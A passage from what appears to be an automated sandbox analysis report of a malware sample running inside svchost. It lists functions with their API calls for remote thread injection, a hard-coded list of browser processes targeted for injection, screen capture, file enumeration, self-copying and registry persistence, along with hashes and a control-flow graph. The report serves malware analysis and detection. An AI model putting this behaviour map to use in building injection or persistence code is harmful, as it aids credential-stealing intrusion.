                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02C933FA
                                                                                                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C9340C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C93424
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C93435
                                                                                                                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C93456
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C93472
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C93483
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            • API String ID: 2650560580-3024904723
                                                                                                                                                                                                            • Opcode ID: 16b50e25f9ab040db3dfa2b1bbdb07aab0756fc76a2135fbef614e906c7b86e1
                                                                                                                                                                                                            • Instruction ID: 1a168fb6bc5f68d4b946373794debbb1d69b3a86ee86773ba1e2fdee5f1489b9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16b50e25f9ab040db3dfa2b1bbdb07aab0756fc76a2135fbef614e906c7b86e1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92619571A40284BBEF12DF64CC89FAA77ACEF85B04F158599FD059B280DB74DA41CB60
                                                                                                                                                                                                            Function 02C93950 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 181COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 02C9395E
                                                                                                                                                                                                            • GetWindowDC.USER32(00000000), ref: 02C93965
                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 02C9397A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$CompatibleCreateDesktop
                                                                                                                                                                                                            • String ID: ($BM
                                                                                                                                                                                                            • API String ID: 3720047489-2980357723
                                                                                                                                                                                                            • Opcode ID: 761bf98ec28bd78f3c0e41a818d42c92f8e27be2211aa4b5b08b509c60d22872
                                                                                                                                                                                                            • Instruction ID: 66da597546c0650b0bfef3b024a0a811454a89ce9df7fc2a3b6aa3b1ec11ce2a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 761bf98ec28bd78f3c0e41a818d42c92f8e27be2211aa4b5b08b509c60d22872
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D516271E40258BBDB11DFA4EC48BAEBBB9FF88711F104659F904E7280DB709D118BA5
                                                                                                                                                                                                            Function 02C97CE0 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 178filememoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75495CE0), ref: 02C97D61
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C97D7D
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 02C97D8C
                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 02C97D99
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 02C97DD8
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 02C97DE6
                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,?), ref: 02C97EDD
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 02C97EEC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$FileLocalwsprintf$AllocCloseFirstFreeNext_snprintf
                                                                                                                                                                                                            • String ID: %s%s$%s\%s$%s\*$.
                                                                                                                                                                                                            • API String ID: 2477558990-1591360731
                                                                                                                                                                                                            • Opcode ID: 22a46c917d42efc872d68bdad4e6a639e7edcdfb77f4687c4e169961cb074ba6
                                                                                                                                                                                                            • Instruction ID: 6757e22f4457f9fe528c54067ee3e75b42a07278352973efa6c4b4563010fc51
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22a46c917d42efc872d68bdad4e6a639e7edcdfb77f4687c4e169961cb074ba6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E5191F1A153919FDB11DF28D848FBBBBADBBC5704F044A48F9819B245D7709908CBA2
                                                                                                                                                                                                            Function 02C83D90 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 87networkstringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                            • DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                            • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                            • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
                                                                                                                                                                                                            • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                            • API String ID: 1656757314-3977723178
                                                                                                                                                                                                            • Opcode ID: 046cff174cf00cf9745e4414d1a13b771669121d0302758fc0263850c3479c27
                                                                                                                                                                                                            • Instruction ID: d45695dd1716ebac61938a8b3cd0950e38a12e6e9132130ccafc4e5caf358cfc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 046cff174cf00cf9745e4414d1a13b771669121d0302758fc0263850c3479c27
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8121CD73E8425867E721E7A49C41FDAB76CDF94B14F0045D5FA88E7080DAF19AC48B91
                                                                                                                                                                                                            Function 02C77020 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 76sleepsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02C77041
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C77052
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02C77060
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C77069
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7707F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C77091
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C770B9
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02C770D2
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 02C770DD
                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000), ref: 02C770E9
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 02C770F4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mutex$HandleOpenSleep$CloseEventExitFileInformationModuleNameProcessRelease
                                                                                                                                                                                                            • String ID: Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}$P0Wu$\explorer.exe
                                                                                                                                                                                                            • API String ID: 2248524772-1625487603
                                                                                                                                                                                                            • Opcode ID: baeaa3e8bd56cf9e915a1522bfc4e803d915b3a43fc1007f0841b28de74fd959
                                                                                                                                                                                                            • Instruction ID: 89f55bf59260a55909fb45ec8e651e1948a1b63d5d2c83ccde98a960c91ce188
                                                                                                                                                                                                            • Opcode Fuzzy Hash: baeaa3e8bd56cf9e915a1522bfc4e803d915b3a43fc1007f0841b28de74fd959
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39210831E847446BE322BB759C09F6AFB9CAFC0B10F004655F95493181DBB4D9188AE2
                                                                                                                                                                                                            Function 02C72BB0 Relevance: 21.5, APIs: 14, Instructions: 466COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocfree$exit
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 337157181-0
                                                                                                                                                                                                            • Opcode ID: 7f48ad7fa4da548279fe1b0c99727c96497688232c9c7f067b880dbf04229b04
                                                                                                                                                                                                            • Instruction ID: 67329b314172805e52ad59086c6dbb5ba13a56f959d6b419cfae029237b9aa8e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f48ad7fa4da548279fe1b0c99727c96497688232c9c7f067b880dbf04229b04
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FDF1CF71A0065A9FDB20CF98D884BAEB7B5FF88314F144169ED05A7340D771EE51CBA2
                                                                                                                                                                                                            Function 02C86370 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88memoryprocessCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02C86384
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 02C863A9
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000), ref: 02C863CD
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|,?,?,00000000), ref: 02C863E7
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C8640B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02C86411
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C86418
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C86446
                                                                                                                                                                                                              • Part of subcall function 02C92E00: OpenProcess.KERNEL32(00000400,00000000,00000000,7556F550,00000000,7744C3F0), ref: 02C92E15
                                                                                                                                                                                                              • Part of subcall function 02C92E00: OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
                                                                                                                                                                                                              • Part of subcall function 02C92E00: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
                                                                                                                                                                                                              • Part of subcall function 02C92E00: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
                                                                                                                                                                                                              • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
                                                                                                                                                                                                              • Part of subcall function 02C92E00: CloseHandle.KERNEL32(?), ref: 02C92ECC
                                                                                                                                                                                                              • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
                                                                                                                                                                                                              • Part of subcall function 02C92E00: CloseHandle.KERNEL32(00000000), ref: 02C92EEF
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 02C8645A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02C86474
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02C86485
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|, xrefs: 02C863E2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
                                                                                                                                                                                                            • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|
                                                                                                                                                                                                            • API String ID: 3461290786-860058239
                                                                                                                                                                                                            • Opcode ID: 309971bf6f53314554b47302d7e277ad4b9c34fe133696fd324226235836fcf3
                                                                                                                                                                                                            • Instruction ID: 1acad026bad8bc81f15bff71473b071b2aa7c70764d43b849abcc9449434b30f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 309971bf6f53314554b47302d7e277ad4b9c34fe133696fd324226235836fcf3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC319470D41254EFDB21DF65D849B9EB7BCFF88718F1085A9E849D3240D7309A45CB61
                                                                                                                                                                                                            Function 02C76A30 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 91threadstringnativeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 02C76A4C
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02C76A5F
                                                                                                                                                                                                              • Part of subcall function 02C92E00: OpenProcess.KERNEL32(00000400,00000000,00000000,7556F550,00000000,7744C3F0), ref: 02C92E15
                                                                                                                                                                                                              • Part of subcall function 02C92E00: OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
                                                                                                                                                                                                              • Part of subcall function 02C92E00: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
                                                                                                                                                                                                              • Part of subcall function 02C92E00: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
                                                                                                                                                                                                              • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
                                                                                                                                                                                                              • Part of subcall function 02C92E00: CloseHandle.KERNEL32(?), ref: 02C92ECC
                                                                                                                                                                                                              • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
                                                                                                                                                                                                              • Part of subcall function 02C92E00: CloseHandle.KERNEL32(00000000), ref: 02C92EEF
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C76A6E
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C76A87
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02C76A8E
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,92f35800a), ref: 02C76AA4
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76AE9
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C76B03
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 02C76B16
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Information$Handle$OpenProcess$CloseCurrentThreadToken$CharDesktopMutexObjectQuerySystemUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                            • String ID: 92f35800a$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                            • API String ID: 1400009243-2156660352
                                                                                                                                                                                                            • Opcode ID: c8ce148320c71e6f7165467db7b5d437f6a75079891ace40bf26555325746e95
                                                                                                                                                                                                            • Instruction ID: cab2f2639501efa66fa813353dfb62881e3343080eb70cdf95d92355d2c32780
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8ce148320c71e6f7165467db7b5d437f6a75079891ace40bf26555325746e95
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A31F272A40255ABDB21CF61CC88BAAB77CFF94B10F144655FE4497280E7B0AD91CFA1
                                                                                                                                                                                                            Function 029A1360 Relevance: 3.2, APIs: 2, Instructions: 241memorylibraryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 029A1451
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 029A1515
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2691342691.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_29a0000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3550616410-0
                                                                                                                                                                                                            • Opcode ID: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                            • Instruction ID: bb8178fee0d07ba4466ffa7705655954c1ec0c1b777c56eb866e195d8b30916b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB914BB5D00719AFCB24DFE8C860BAEB7BAAF88354F154559E809B7344D734AA01CF94
                                                                                                                                                                                                            Function 02C825C0 Relevance: 100.3, APIs: 41, Strings: 16, Instructions: 584memoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 326 2c825c0-2c82623 EnterCriticalSection GetCurrentDirectoryA _snprintf SetCurrentDirectoryA 327 2c82629-2c8262c 326->327 328 2c82beb-2c82c07 SetCurrentDirectoryA PathFileExistsA 326->328 329 2c82631-2c82635 327->329 330 2c82c09-2c82c1f SetFileAttributesA DeleteFileA 328->330 331 2c82c25-2c82c3b 328->331 334 2c82651-2c82653 329->334 335 2c82637-2c82639 329->335 330->331 332 2c82c3d-2c82c4a GetProcessHeap HeapValidate 331->332 333 2c82c57-2c82c5b 331->333 332->333 337 2c82c4c-2c82c55 GetProcessHeap HeapFree 332->337 338 2c82c5d-2c82c6a GetProcessHeap HeapValidate 333->338 339 2c82c77-2c82c8a LeaveCriticalSection 333->339 336 2c82656-2c82658 334->336 340 2c8263b-2c82641 335->340 341 2c8264d-2c8264f 335->341 342 2c8265a-2c82660 call 2c753e0 336->342 343 2c82665-2c82667 336->343 337->333 338->339 344 2c82c6c-2c82c75 GetProcessHeap HeapFree 338->344 340->334 345 2c82643-2c8264b 340->345 341->336 342->343 347 2c82670-2c82681 343->347 344->339 345->329 345->341 347->347 348 2c82683-2c82699 PathAddBackslashA 347->348 349 2c826a0-2c826a6 348->349 349->349 350 2c826a8-2c826f0 SHGetFolderPathA PathAddBackslashA 349->350 351 2c826f2-2c826f7 350->351 351->351 352 2c826f9-2c82703 351->352 353 2c82704-2c8270a 352->353 353->353 354 2c8270c-2c82732 CopyFileA 353->354 355 2c82740-2c82751 354->355 355->355 356 2c82753-2c82762 PathAddBackslashA 355->356 357 2c82763-2c82769 356->357 357->357 358 2c8276b-2c82793 357->358 359 2c82798-2c8279c 358->359 360 2c827b8-2c827ba 359->360 361 2c8279e-2c827a0 359->361 364 2c827bd-2c827bf 360->364 362 2c827a2-2c827a8 361->362 363 2c827b4-2c827b6 361->363 362->360 365 2c827aa-2c827b2 362->365 363->364 366 2c827dd-2c8281b GetTickCount _snprintf VirtualAlloc 364->366 367 2c827c1-2c827d7 SetFileAttributesA DeleteFileA 364->367 365->359 365->363 366->328 368 2c82821-2c82844 lstrcpynA call 2c97b50 366->368 367->366 371 2c82855-2c8289c VirtualFree call 2c766d0 SetFileAttributesA RemoveDirectoryA call 2c76930 368->371 372 2c82846-2c82850 call 2c97ce0 call 2c97c50 368->372 371->328 380 2c828a2 371->380 372->371 381 2c828a5-2c828aa 380->381 381->381 382 2c828ac-2c828b5 381->382 383 2c828df-2c828e4 382->383 384 2c828b7-2c828d1 GetProcessHeap HeapAlloc 382->384 383->328 385 2c828ea-2c828ff 383->385 384->383 386 2c828d3-2c828dc memset 384->386 387 2c82901-2c82906 385->387 386->383 387->387 388 2c82908-2c8290d 387->388 389 2c82910-2c82916 388->389 389->389 390 2c82918-2c82929 389->390 391 2c82930-2c82936 390->391 391->391 392 2c82938-2c8294e 391->392 393 2c82950-2c82956 392->393 393->393 394 2c82958-2c8296b 393->394 395 2c82970-2c82975 394->395 395->395 396 2c82977-2c8297c 395->396 397 2c82980-2c82986 396->397 397->397 398 2c82988-2c82999 397->398 399 2c829a0-2c829a6 398->399 399->399 400 2c829a8-2c829ba call 2c732f0 399->400 403 2c829c0-2c829c5 400->403 403->403 404 2c829c7-2c829cc 403->404 405 2c829d0-2c829d6 404->405 405->405 406 2c829d8-2c829e9 405->406 407 2c829f0-2c829f6 406->407 407->407 408 2c829f8-2c82a0b 407->408 409 2c82a10-2c82a15 408->409 409->409 410 2c82a17-2c82a1c 409->410 411 2c82a20-2c82a26 410->411 411->411 412 2c82a28-2c82a39 411->412 413 2c82a40-2c82a46 412->413 413->413 414 2c82a48-2c82a5e 413->414 415 2c82a60-2c82a66 414->415 415->415 416 2c82a68-2c82a75 415->416 417 2c82a78-2c82a7e 416->417 417->417 418 2c82a80-2c82a90 417->418 419 2c82a92-2c82a97 418->419 419->419 420 2c82a99-2c82a9e 419->420 421 2c82aa0-2c82aa6 420->421 421->421 422 2c82aa8-2c82ab9 421->422 423 2c82ac0-2c82ac6 422->423 423->423 424 2c82ac8-2c82adb 423->424 425 2c82ae0-2c82ae5 424->425 425->425 426 2c82ae7-2c82aec 425->426 427 2c82af0-2c82af6 426->427 427->427 428 2c82af8-2c82b09 427->428 429 2c82b10-2c82b16 428->429 429->429 430 2c82b18-2c82b2f 429->430 431 2c82b31-2c82b33 430->431 432 2c82b36-2c82b3b 431->432 432->432 433 2c82b3d-2c82b48 call 2c82410 432->433 436 2c82b4a-2c82b55 Sleep 433->436 437 2c82b57-2c82b5f 433->437 436->431 436->437 438 2c82b60-2c82b64 437->438 439 2c82b80-2c82b82 438->439 440 2c82b66-2c82b68 438->440 443 2c82b85-2c82b87 439->443 441 2c82b6a-2c82b70 440->441 442 2c82b7c-2c82b7e 440->442 441->439 444 2c82b72-2c82b7a 441->444 442->443 443->328 445 2c82b89-2c82bbd IsUserAnAdmin GetTickCount RegOpenKeyExA 443->445 444->438 444->442 445->328 446 2c82bbf-2c82be5 RegSetValueExA RegFlushKey RegCloseKey 445->446 446->328
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD888,75572F00,00000000,75570F00), ref: 02C825D9
                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02C825EB
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C8260B
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8261B
